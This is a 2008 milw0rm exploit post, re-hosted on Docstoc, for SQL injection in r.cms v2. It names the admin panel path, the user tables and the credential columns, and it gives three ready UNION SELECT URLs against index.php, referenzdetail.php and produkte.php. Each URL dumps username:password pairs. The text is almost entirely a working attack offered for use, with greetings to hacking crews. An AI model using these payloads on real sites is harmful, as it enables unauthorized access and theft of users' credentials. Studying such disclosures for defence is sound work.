Docstoc

r.cms v2 Multiple SQL Injection Vulnerabilities

Document Sample
r.cms v2 Multiple SQL Injection Vulnerabilities Powered By Docstoc
					                               r.cms v2 Multiple SQL Injection Vulnerabilities                                    Page 1/1
  1    ###############################################################
  2    #
  3    #            r.cms V2 − Multiple SQL Injection Vulnerabilities
  4    #
  5    #      Vulnerability discovered by: Lidloses_Auge
  6    #      Greetz to:                    −=Player=− , Suicide, g4ms3, enco,
  7    #                                    Palme, GPM, Free−Hack
  8    #      Date:                         16.12.2008
  9    #
  10   ###############################################################
  11   #
  12   #      Admin Panel: [Target]/rcms/
  13   #      Description: Almost every GET parameter is vulnerable
  14   #                                to SQL Injection, so i won’t list ’em all.
  15   #                                        There are two possible tables which contain
  16   #                                        user data, depending on the CMS version.
  17   #                                        Table:
  18   #                                                rcmsv2
  19   #                                        or:
  20   #                                                rcms
  21   #
  22   #                                        The Columns for username and password are:
  23   #                                                username
  24   #                                                userpassword
  25   #
  26   ###############################################################
  27
  28   http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/*
  29   http://xxx/referenzdetail.php?id=−6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_u
       ser/*
  30   http://xxx/produkte.php?id=−2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/
       *
  31
  32   # milw0rm.com [2008−12−17]




Lidloses_Auge                                                                                                      12/17/2008

				
DOCUMENT INFO